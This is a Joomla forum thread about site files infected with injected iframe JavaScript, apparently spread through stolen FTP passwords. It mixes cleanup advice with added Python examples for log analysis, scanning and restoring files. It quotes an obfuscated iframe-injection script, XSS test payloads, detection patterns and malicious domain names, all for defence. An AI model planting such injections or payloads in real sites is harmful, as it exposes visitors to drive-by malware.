Discussion - Malicious Javascript in your site
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Enthusiast
- Posts: 239
- Joined: Sun Apr 30, 2006 11:35 am
- Location: UK
.ftpaccess file
One option my hosting provider offers as an added level of security is the use of a .ftpaccess file which can block ftp access outside of a specified range of ip addresses. This is really helpful if you normally work from the same location as, even if your ftp passwords have been compromised, a hacker can't gain access to your site if they operate from outside the range of IP addresses that you specify in the .ftpaccess file.
-
- Joomla! Fledgling
- Posts: 3
- Joined: Thu Sep 10, 2009 9:59 am
Re: Malicious Javascript in your site
Thanks @tr1, I'll get in touch with my hosting provider to set this up, if possible.
If anyone wants the php script that I found in the files, PM me...I won't be posting exactly how to corrupt a Joomla site.
- mandville
- Joomla! Master
- Posts: 15153
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Malicious Javascript in your site
tr1 = that sounds interesting as normally that can only be done at a vpos root level and not a shared hosting level.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
-
- Joomla! Fledgling
- Posts: 2
- Joined: Sun Nov 29, 2009 10:52 am
Re: Malicious Javascript in your site
Hi All,
My site was hacked a second time and this time I found this script. I have checked the checklist provided on the website.
I have scanned my website with Acunetix web scanner free edition. I found 72 XSS loopholes.
Below are the attack details of the report:
The Cookie variable 5cc81001e3583f30bd107e634db40f26 has been set to 1>"><ScRiPt%20%0d%0a>alert(418726250202)%3B</ScRiPt>.
The Cookie variable ytstylefont has been set to 1"+onmouseover=alert(419746258905)+.
Can somebody explain the above report?
I have this script in 145 files and I am cleaning it out.
<script> var x = unescape("[removed encoded URL]");document.write("<i"+"fr"+"am"+"e s"+"r"+"c=""+x+"/ind"+"e"+"x.p"+"hp" w"+"id"+"th="0" he"+"i"+"ght="0" fr"+"a"+"m"+"ebor"+"de"+"r="0"><"+"/ifra"+"m"+"e>"); </script>
I don't know how the hacker managed to put it in hundreds of files. Please give me some suggestions to secure my site. Currently I am on shared hosting - will dedicated hosting solve some of the problems?
Thanks in advance for your help on this.
Cheers,
Designx9
Last edited by ooffick on Mon Nov 30, 2009 10:09 am, edited 1 time in total.
Reason: Mod Note: Removed the code to the Hacker, we don't need to promote the Hacker's website any further.
-
- Joomla! Guru
- Posts: 522
- Joined: Mon Oct 01, 2007 11:35 am
Re: Malicious Javascript in your site
If you can check your FTP log you will probably find a spike of connections. If so you are hit by a trojan which found the FTP passwords in your computer.
-
- Joomla! Fledgling
- Posts: 2
- Joined: Sun Nov 29, 2009 10:52 am
Re: Malicious Javascript in your site
Hi Evel,
Please let me know what I should do. I have changed the FTP password. I have cleaned the files but in some files there is still JavaScript embedded.
Please advise.
Thanks,
D
ewel wrote:If you can check your FTP log you will probably find a spike of connections. If so you are hit by a trojan which found the FTP passwords in your computer.
- mandville
- Joomla! Master
- Posts: 15153
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Malicious Javascript in your site
designx9 wrote:Hi Evel,
but there are some files still there is javascript embeded.
Please advice.
Thanks,
D
do a complete overwrite of all files or trash the folders and start again
http://docs.joomla.org/Security_Checklist_7 is a good read along with the other security checklists
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
-
- Joomla! Guru
- Posts: 522
- Joined: Mon Oct 01, 2007 11:35 am
Re: Malicious Javascript in your site
You could follow the following steps to fully clean and repair the website, if a good backup is not available.
I am assuming that no modifications have been made to Joomla core files which cannot be made again using a local computer copy of the modifications that had been made. I am also assuming that only html and php files have been infected - I have no experience with compromised .js files.
First, ensure A) that all local computers with FTP access to the website are free of malware, B) that the website is clean, and C) that the FTP passwords have been changed. Do not visit an infected website, do not save passwords in your FTP client and do not use FTP unless and until those three points are covered.
1. Make a backup copy of configuration.php from the root of your Joomla installation on your server.
2. Find filist.php and upload it, preferably using your cPanel instead of FTP. Then use it to list all files by date to see at which dates your site has been infected and which files have been infected. You could also consult your FTP logs to find the date on which the number of connections peaked.
3. Download a full installation package zip of the latest Joomla version. Open it and remove the installation folder as well as the configuration.php-dist. Then save and close the zip. Upload it to the root of your Joomla installation on your server, preferably using your cPanel instead of FTP. Then extract the zip.
4. Run filist.php again, to see which files with a modification date on the date of infection remain. All of these should be part of third party extensions. For the moment, forget about index.html files. You could open each of the php files with your cPanel code editor to find and remove the malicious tags. It will either be an iframe tag or a script tag, and in the last case it will have visible JavaScript writing an iframe into the page or it will be encoded/obfuscated. However, there is a good chance that part of the file was deleted when the malicious tag was injected. Therefore, it is much better to replace infected files by a clean copy that you upload, preferably using cPanel. You can take a clean copy from a downloaded package of the third party extension of which the infected file is part.
5. Now all you should have left as infected files are index.html files. To clean these manually is a huge job. Since these files will not be seen by anyone unless they try to see the content of a folder on your server through their browser you could decide to leave them. But if you email me I will send you a script I have which makes sure every subfolder has an index.html file.
Good luck!
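The FTP-log check mentioned in this thread (look for the date on which connections peaked), as an added example that is not from any poster: it counts uploads per day in a transfer log, reports the days that stand out, and lists uploads from addresses outside the ranges you would allow in a .ftpaccess file. It assumes the host writes its transfer log in the xferlog format; the sample lines, addresses, user name and the spike factor are constructed.

```python
"""Find upload spikes and unexpected source addresses in an xferlog-format FTP log."""
from collections import Counter
from datetime import datetime
from ipaddress import ip_address, ip_network
from statistics import median


def _entry(stamp, host, path, direction="i"):
    # xferlog fields after the timestamp: transfer-time, remote-host, size, filename,
    # type, action-flag, direction (i = upload, o = download), access-mode, username,
    # service, auth-method, auth-user-id, completion-status
    return f"{stamp} 1 {host} 5120 {path} b _ {direction} r siteuser ftp 0 * c"


# Constructed sample: a few ordinary transfers, then 30 uploads within 30 seconds.
SAMPLE_LOG = "\n".join(
    [
        _entry("Mon Nov 23 10:02:11 2009", "198.51.100.7", "/www/templates/mytpl/index.php"),
        _entry("Mon Nov 23 10:05:40 2009", "198.51.100.7", "/www/templates/mytpl/css/style.css"),
        _entry("Tue Nov 24 16:20:03 2009", "198.51.100.7", "/www/images/logo.png"),
        _entry("Wed Nov 25 09:00:00 2009", "198.51.100.7", "/www/configuration.php", "o"),
        _entry("Wed Nov 25 09:12:51 2009", "198.51.100.7", "/www/images/banner.png"),
    ]
    + [
        _entry(f"Thu Nov 26 03:14:{s:02d} 2009", "203.0.113.50", f"/www/dir{s}/index.php")
        for s in range(30)
    ]
)


def parse_xferlog(text):
    """Parse xferlog lines into dicts; lines with fewer than 18 fields are skipped."""
    records = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 18:
            continue
        when = datetime.strptime(" ".join(f[1:5]), "%b %d %H:%M:%S %Y")
        records.append({"when": when, "host": f[6], "path": f[8],
                        "direction": f[11], "user": f[13]})
    return records


def uploads_per_day(records):
    """Count incoming transfers (files written to the site) per calendar day."""
    return Counter(r["when"].date() for r in records if r["direction"] == "i")


def spike_days(per_day, factor=5):
    """Days whose upload count exceeds `factor` times the median day (assumed threshold)."""
    if not per_day:
        return []
    baseline = max(median(per_day.values()), 1)
    return sorted(day for day, n in per_day.items() if n > factor * baseline)


def uploads_outside(records, allowed_ranges):
    """Upload counts per source that is not inside the allowed IP ranges."""
    nets = [ip_network(r) for r in allowed_ranges]
    outside = Counter()
    for rec in records:
        if rec["direction"] != "i":
            continue
        try:
            addr = ip_address(rec["host"])
        except ValueError:
            outside[rec["host"]] += 1  # logged as a hostname: cannot be matched to a range
            continue
        if not any(addr in net for net in nets):
            outside[rec["host"]] += 1
    return outside


if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_LOG)
    print("spike days:", spike_days(uploads_per_day(recs)))
    print("uploads from outside 198.51.100.0/24:", dict(uploads_outside(recs, ["198.51.100.0/24"])))
```

A day flagged here is the date to look for when listing site files by modification date.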
- Prowebdesign
- Joomla! Enthusiast
- Posts: 197
- Joined: Sun Oct 04, 2009 10:37 am
- Contact:
Re: Malicious Javascript in your site
Thanks Leolam - truly helpful. Though I have never yet had to deal with such malicious JS code, I will keep in mind your suggestions to keep my site uninfected.
Best regards,
Streamline
Web design blog and tutorials http://www.majas-lapu-izstrade.lv
http://www.uniqcube.com
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
I got javascript turning up on a site overnight. Frontend and backend.
In fact, just overnight I get this error:
Parse error: syntax error, unexpected '<' in /home/stic2808/sitename/www/index.php on line 91
I uploaded my index.php (not downloading a copy to check what was wrong, which would have been a good idea) and the site is back, but the columns are all displayed weird because there is javascript output before the html-tag:
Code:
<script>....</script>
When I disable ACESEF (extension for sef -urls) the javascript is gone, and the site displays correctly, but obviously all sef-urls do not work. (This is on a live site with 1000's of active users.)
In the admin, the menu bar does not dropdown any more and all, sliding panes are open, because underneath the html-tag is also extra code:
Code:
<script>....</script>
<script>....</script>
This problem in the admin remains even if ACESEF is disabled. I also disabled all system plugins to see if that would make a difference for the backend. But the problem remains.
I had this a couple of weeks ago, same thing. I reuploaded the index.php and saw weird output. While I was searching for what was going on it was back to normal all of a sudden.
I did a search in dreamweaver for
Code:
try{window.onload
in my local copy of the site and found nothing. So where could this code come from? It is obviously inserting some script somewhere. Which makes me wonder if the site was hacked.
I am now downloading all files to a separate dir, which I will scan when downloaded.
Last edited by ooffick on Sun Dec 20, 2009 3:16 pm, edited 1 time in total.
Reason: Mod Note: Removed the code of the Hacker, we don't need to promote the Hacker's website any further.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
update:
I downloaded my entire site and did a code search and found that this code has been inserted in 1868 files in the site. PHP, html, js, also of custom extensions. So the script the hacker is running checks on file type rather than overwrites the known Joomla files.
So yes, this site was hacked.
Fortunately I have the clean files on my local development version.
I read this thread and we are talking mainly about the source of this being ftp-accounts which might have been stolen from infected PCs. Is that the only way anyone has been infected so far? I'm using filezilla on a pretty safe PC. Is there any online scan that finds this ugly virus? How do I check if my PC is infected with this specific thing?
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
It may be worth noting that the ftp-account was also used in the Joomla configuration. So it might be that somehow Joomla's configuration.php was read and the ftp-accounts stolen that way.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
-
- Joomla! Guru
- Posts: 522
- Joined: Mon Oct 01, 2007 11:35 am
Re: Malicious Javascript in your site
As I wrote in an article on my site, these Trojans tend to look for HTML and PHP files, and apparently sometimes also JS files. As far as I know they look for files with one of the following words in the file name: index, default, login, main and home. It seems that only one file per folder is injected with a malicious tag. The tags inserted are iFrames or Javascript - the latter to insert Javascript that will put an iFrame in the page. These tags are usually inserted at the end of a file or immediately after the body tag on the same line. If you have been infected by this sort of Trojan then presumably all this is true on your website.
Unless there is a security hole in Joomla, or your particular setup, that was used to get to your configuration.php I would say your local computer was infected by a Trojan horse. If your configuration.php was read then presumably the hackers doing so could have done more and other things than what happened to you, and what happened seems to match the signature of those Trojans. So it seems overwhelmingly more likely that your local computer got injected than that there is a security hole in Joomla. But who knows (not me!), one of your extensions may provide hackers an opening.
Unfortunately you can never be really sure that your local computer is clean. No single anti-virus engine finds all malware, and most of them don't like it if you install several engines. But, apparently Malwarebytes is a fairly safe bet. I have ZoneAlarm which does seem to catch these things. Others reported Kaspersky to be good, as well as AVG and Avast. I've also heard that NOD is good.
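A scanner built from the signature described in this post and from the "list files by date" steps of the earlier clean-up post, as an added example that is not code from the thread or from any tool named in it. It flags zero-size iframes and scripts that assemble one with document.write, records where the tag sits and whether the file name is one of the targeted words, then lists other files modified on the same dates. The sample site, its file names and the placeholder.example address are constructed, and the copy being scanned is assumed to have kept the server's modification times.

```python
"""Scan a site copy for zero-size iframes and scripts that assemble one."""
import os
import re
import tempfile
from datetime import datetime
from pathlib import Path

TARGET_EXT = {".php", ".html", ".htm", ".js"}
NAME_WORDS = ("index", "default", "login", "main", "home")  # names listed in the post
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
JOINT = re.compile(r"""["']\s*\+\s*["']""")  # '<i'+'fr'+'ame' becomes '<iframe'
ZERO_IFRAME = re.compile(
    r"""<iframe\b[^>]*\b(?:width|height)\s*=\s*\\?["']?0(?![\d.%])""", re.I)
# Constructed sample of the injected script, with the URL left out as on the page.
OBFUSCATED = (
    "<script>var x = unescape('[removed encoded URL]');"
    "document.write('<i'+'fr'+'am'+'e s'+'r'+'c=\"'+x+'/ind'+'e'+'x.p'+'hp\" w'+'id'"
    "+'th=\"0\" he'+'i'+'ght=\"0\"></'+'ifra'+'m'+'e>');</script>\n"
)


def _mdate(path):
    return datetime.fromtimestamp(path.stat().st_mtime).date()


def find_injections(text, is_js=False):
    """Return [(kind, offset)] for zero-size iframes, literal or written by script."""
    hits = [("hidden-iframe", m.start()) for m in ZERO_IFRAME.finditer(text)]
    bodies = [(0, text)] if is_js else [(m.start(), m.group(1)) for m in SCRIPT.finditer(text)]
    for offset, body in bodies:
        joined = JOINT.sub("", body)  # undo the string splitting before matching
        if ("document.write" in joined and ZERO_IFRAME.search(joined)
                and not ZERO_IFRAME.search(body)):
            hits.append(("script-writes-iframe", offset))
    return hits


def placement(text, offset):
    """Position of the tag: right after <body> on its line, end of file, or elsewhere."""
    line_start = text.rfind("\n", 0, offset) + 1
    if re.search(r"<body\b[^>]*>\s*$", text[line_start:offset], re.I):
        return "after-body-tag"
    closing = re.search(r"</html\s*>", text, re.I)
    if (closing and offset >= closing.end()) or "\n" not in text[offset:].strip():
        return "end-of-file"
    return "elsewhere"


def scan(root):
    """Return one record per suspicious file, with its modification date."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in TARGET_EXT:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = find_injections(text, is_js=path.suffix.lower() == ".js")
        if hits:
            kind, offset = hits[0]
            findings.append({
                "path": path.relative_to(root).as_posix(),
                "modified": _mdate(path),
                "kind": kind,
                "placement": placement(text, offset),
                "targeted_name": any(w in path.stem.lower() for w in NAME_WORDS),
            })
    return findings


def same_day_files(root, findings):
    """Unflagged files modified on the dates of flagged ones: review these by hand."""
    dates = {f["modified"] for f in findings}
    known = {f["path"] for f in findings}
    return sorted(
        p.relative_to(root).as_posix() for p in Path(root).rglob("*")
        if p.is_file() and _mdate(p) in dates and p.relative_to(root).as_posix() not in known)


def build_sample_tree(root):
    """Write the constructed sample site; modification times are set explicitly."""
    clean, bad = datetime(2009, 10, 1, 12).timestamp(), datetime(2009, 11, 26, 3).timestamp()
    hidden = '<iframe src="http://placeholder.example/" width="0" height="0"></iframe>'
    files = {
        "index.php": (clean, '<html><body>\n<iframe src="/map.html" width="560"></iframe>\n'),
        "templates/mytpl/index.php": (bad, "<html>\n<body>" + hidden + "\n<p>hi</p>\n</body></html>\n"),
        "components/com_demo/default.php": (bad, "<html><body><p>x</p></body></html>\n" + OBFUSCATED),
        "images/stats.php": (bad, "<?php /* matched by no pattern */ ?>\n"),
    }
    for rel, (mtime, body) in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
        os.utime(target, (mtime, mtime))


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_tree(site)
        found = scan(site)
        for record in found:
            print(record)
        print("same-day files to review:", same_day_files(site, found))
```

Fully encoded payloads match neither pattern, which is why the same-day listing matters: a file that changed on the infection date but shows no visible tag still needs a manual look or replacement from a clean package.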
-
- Joomla! Apprentice
- Posts: 10
- Joined: Wed Nov 18, 2009 9:44 pm
Re: Malicious Javascript in your site
"I'm using filezilla on a pretty save pc"
Simple, there's your problem. Filezilla altered all my uploaded files and added a link to the bottom of my pages in the same font colour as the background, so it took a while before I saw it. Have a look, I bet that's your problem.
- mandville
- Joomla! Master
- Posts: 15153
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Malicious Javascript in your site
fasterstill wrote:Filezilla altered all my uploaded files and added a link to the bottom of my pages in the same font colour as the background so it took a while before i saw it.
please provide proof that it was intentional on the part of FileZilla or edit your post to say you think that they used filezilla to infect your site.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
portable mini golf https://www.putterspalace.co.uk/
-
- Joomla! Apprentice
- Posts: 10
- Joined: Wed Nov 18, 2009 9:44 pm
Re: Malicious Javascript in your site
OK how's this. I downloaded a free copy of Filezilla, I believe it was from Softpedia. That copy altered files that were uploaded with it and added a link to the bottom of my pages without my permission or knowledge.
- ooffick
- Joomla! Master
- Posts: 11626
- Joined: Thu Jul 17, 2008 3:10 pm
- Location: Ireland
- Contact:
Re: Malicious Javascript in your site
fasterstill wrote:OK how's this. I downloaded a free copy of Filezilla, i belive it was from softpedia. That copy altered files that were uploaded with it and added a link to the bottom of my pages without my permision or knowledge.
Are you sure the uploaded files were not changed by a virus?
Did you encrypt the connection to your server via SSL or TLS?
Olaf
Olaf Offick - Global Moderator
learnskills.org
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: Malicious Javascript in your site
In my experience, this behaviour is caused by: http://www.iss.net/threats/gumblar.html or one of its variants. Possibly when you used your FTP client, your FTP login details were logged and then used by the virus/trojan.
Brad Baker
https://xyzuluhosting.com
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Malicious Javascript in your site
@carsten888
"Is there any online scan that finds this ugly virus? How do I check if my pc is infected with this specific thing?"
Have you installed and run a full computer scan on your computer with Malwarebytes?
The free version works fine and people have reported success in finding malware well hidden on their computer that was not otherwise found.
Edit: Be sure you download the latest database updates (update tab) for it after installing and before scanning.
PhilD
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
"Have you installed and run a full computer scan on your computer with Malwarebytes?"
Yes, did that. Nice program. Did not find anything on my pc. I am sure someone else who had the ftp-account data has been infected.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Malicious Javascript in your site
Yes it is quite possible that one or more persons who have ftp access have been infected. Until you get a handle on things, I would disable any extra ftp accounts and encourage the others to check their computers.
As a reminder, check out Checklist #7 to use as a guide in fixing things.
PhilD
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri Jan 15, 2010 7:41 pm
Re: Malicious Javascript in your site
gulenzek wrote:I have also some Web sites in Godaddy. During last 15months, my joomla installations -- 1.5.7, 1.5.8 and 1.5.11 -- have been hacked 4 times. The attackers are overwriting index.php, index.html, deafult.php, default_item.php files and adding "eachbul.net/click=" together with a hexadecimal number by assigning to "click" parameter in an iframe tag.
And another incident, the attackers overwriting another address -- yourlotcar.cn:8080/index.php -- in an iframe again. Although my installations 1.5.8 and 1.5.11, I really don't understand how this happens.
I am using CuteFTP 2.0 to access my account and my computers have up-to-date anti-virus softwares.
Yes dear, I am facing the same problem and my hosting is also the same. I just restore it and again the hacker goes to my Joomla site and edits the files. So then I deleted the accounts, I went to the Ubuntu OS and changed all the things. Now my site is down with the Joomla announcement that the site is down for maintenance. What to do next? Any idea how to overcome this problem? They are doing it again and again. I do not understand what to do?
- carsten888
- Joomla! Ace
- Posts: 1224
- Joined: Sat Feb 11, 2006 8:32 am
- Contact:
Re: Malicious Javascript in your site
"i do not understand what to do ?"
- change your ftp-password
- do not just upload the old files over the new files. The site looks repaired, but as the hackers had FTP access there could very well be a backdoor somewhere. So you need to REPLACE each directory instead of just overwriting it. To do this in a way so your site does not go down:
1. In your ftp, make a directory 'administrator2' in your root.
2. Upload your local version of 'administrator' there.
3. When all is uploaded, change the name of 'administrator' to 'administrator_old' (site might now be crippled) and
4. quickly change the name of 'administrator2' to 'administrator' (site works again).
5. Do that for each directory.
6. Make sure there are no extra files anywhere in the root (as well as anywhere in the rest of the site).
You can ask your host if they have a backup to put that back. What they will do most of the time is also just overwriting the current site with the old site. So if there is a backdoor in the site, it will not get deleted. Letting your host restore your site with an old copy is a lot easier, but as I discovered, the previous version was hacked as well by a previous attack. So if you do that option, download the entire site and scan it thoroughly.
http://www.pages-and-items.com my extensions:
User-Private-Page, Redirect-on-Login, Admin-Help-Pages, Dynamic-Menu-Links, Admin-Menu-Manager, plugin load module in article, plugin pure css tooltip and more...
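Why replacing a directory differs from uploading over it, as an added example that is not code from the post above: it compares a live directory with a known-clean copy, shows that an overwrite-style restore leaves an extra file in place, and then performs the same rename sequence on a local filesystem. The directory layout, file contents and the cache_x.php file name are constructed; over FTP the two renames are done in the client instead.

```python
"""Compare a live site directory with a known-clean copy, then replace it by rename."""
import hashlib
import shutil
import tempfile
from pathlib import Path


def manifest(root):
    """Map each file's path (relative to root) to the SHA-256 of its content."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}


def compare(clean_root, live_root, ignore=()):
    """Report files only on the live site, files that differ, and files that are gone."""
    clean, live, skip = manifest(clean_root), manifest(live_root), set(ignore)
    return {
        "extra": sorted(set(live) - set(clean) - skip),
        "changed": sorted(k for k in (set(live) & set(clean)) - skip if live[k] != clean[k]),
        "missing": sorted(set(clean) - set(live) - skip),
    }


def overwrite_restore(clean_dir, live_dir):
    """Upload the clean files over the live ones: anything extra stays where it is."""
    shutil.copytree(clean_dir, live_dir, dirs_exist_ok=True)


def swap_restore(clean_dir, live_dir):
    """The rename sequence from the post, for one directory."""
    live_dir = Path(live_dir)
    staged = live_dir.with_name(live_dir.name + "2")
    retired = live_dir.with_name(live_dir.name + "_old")
    shutil.copytree(clean_dir, staged)  # steps 1-2: clean copy uploaded next to the live one
    live_dir.rename(retired)            # step 3: the site is briefly without this directory
    staged.rename(live_dir)             # step 4: the clean copy takes over the name
    # The retired copy still holds whatever was planted; move it out of the web root
    # or delete it once it has been examined.
    return retired


def build_sample(base):
    """Constructed sample: a clean 'administrator' and a live one with an edit and an extra file."""
    clean = Path(base) / "clean" / "administrator"
    live = Path(base) / "live" / "administrator"
    for root in (clean, live):
        (root / "includes").mkdir(parents=True)
        (root / "index.php").write_text("<?php // entry point\n")
        (root / "includes" / "helper.php").write_text("<?php // helper\n")
    (live / "index.php").write_text("<?php // entry point\n<script>/* injected */</script>\n")
    (live / "includes" / "cache_x.php").write_text("<?php // stand-in for a planted file\n")
    return clean, live


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        clean, live = build_sample(base)
        print("before:         ", compare(clean, live))
        overwrite_restore(clean, live)
        print("after overwrite:", compare(clean, live))
        swap_restore(clean, live)
        print("after swap:     ", compare(clean, live))
```

Files that legitimately differ between the copies, such as configuration.php, can be passed in `ignore`.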
-
- Joomla! Fledgling
- Posts: 4
- Joined: Fri Jan 15, 2010 7:41 pm
Re: Malicious Javascript in your site
Thanks for the reply. Also tell me what kind of plugins for security I should install to make my site more secure? It's currently down. I just installed Windows XP Service Pack 3 and a registered anti-virus, so now I change the passwords and am doing all the things. But I want to know what to do next? Any idea? Except the checklist, what to do? When I restored my files with the old ones it was showing the files, so I selected "if the file is newer then overwrite", so it overwrote them all. So now the site is working fine, like my phpBB forum, but Joomla is not working because when I put the site up they got logged in to my site, I don't know how. So I removed the users and changed the password and set the site to down. That's what I did. I will appreciate it if you give me more security tips.
regards
rabeel
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Malicious Javascript in your site
You can follow the Security Checklist 7 as well as the rest of the checklists
Some of the most important things are to make sure Joomla and extensions you use are up to date and no extensions you use are not on the VEL.
Other things are to use a quality host that cares about security (uses suphp, files 644/directories 755 as default) and to regularly check with several different programs (not just depend on anti-virus) that computers used to access sensitive areas of a site and for ftp are clean of malware.
For replacing core Joomla files you should be using the files contained in a fresh download of the full install package. I.E. overwrite the core files with the freshly downloaded ones. This is outlined in more detail in the checklists. Any extensions/templates should be reinstalled using fresh downloads.
PhilD
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: Malicious Javascript in your site
Since I cannot edit my own post anymore it seems I need to post this here:
As Ewout also already pointed out as well very clearly many issues are caused by hijacked password from YOUR (!) PC.
I quote " Today you need to remember many passwords. You need a password for the Windows network logon, your e-mail account, your homepage's FTP password, online passwords (like website member account), etc. etc. etc. The list is endless. Also, you should use different passwords for each account. Because if you use only one password everywhere and someone gets this password you have a problem... A serious problem. The thief would have access to your e-mail account, homepage, etc. Unimaginable. "
KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).
Strongly consider to install this!
http://keepass.info/
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: Malicious Javascript in your site
Great suggestions Leo.
Everyone: Be sure to also take into account that this kind of FTP activity usually implies your local PC has been compromised in some way. Fixing up your website is just a bandaid; you need to also address your local machine and remove the trojan, which in my experience accounts for every one of these kinds of compromises I have personally observed.
Brad Baker
https://xyzuluhosting.com
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: Malicious Javascript in your site
@ Brad....Can you insert this in the initial post for me so it does not go unnoticed?
In case your site is affected a perfect script for cleaning can be obtained via Ewout on http://www.joomlaloft.com/ or your host might be able to run a script to clean your files
But again: Your own PC as stated in the sticky is the cause of most problems as is your host if they do not run suPHP (!)
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
- brad
- Joomla! Master
- Posts: 13272
- Joined: Fri Aug 12, 2005 12:38 am
- Location: Australia
- Contact:
Re: Malicious Javascript in your site
It's not our practice to link to 3rd party sites for issues like this (we do link to JED however) and besides it's a paid script as well.
You can always create a new suggested post, and the moderators can then decide if that thread needs to be stickied or not. I do think this thread is probably already confusing to users, though not your fault of course.
I'll leave it to the quite capable moderators on this section to make the final call though.
Brad Baker
https://xyzuluhosting.com
- leolam
- Joomla! Master
- Posts: 20652
- Joined: Mon Aug 29, 2005 10:17 am
- Location: Netherlands/ Germany/ S'pore/Bogor/ North America
- Contact:
Re: Malicious Javascript in your site
brad wrote: It's not our practice to link to 3rd party sites for issues like this (we do link to JED however) and besides it's a paid script as well.
@ Brad I was pointing at the KeePass part. What is wrong about posting the link to that?
3 hours ago on Alltogether (become a member, it is free!) posted by Ewout Wierda, the creator of the script:
"Meanwhile, however, this week someone asked for a copy which I sent for free. Then he asked for a little support, which I gave, again for free. In the end the script made that person very happy so that was exactly what I had been after..."
What hurts this community is the formalistic approach as expressed here again regarding Ewout and his excellent extension. Pity!
What is wrong with paid scripts btw?
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -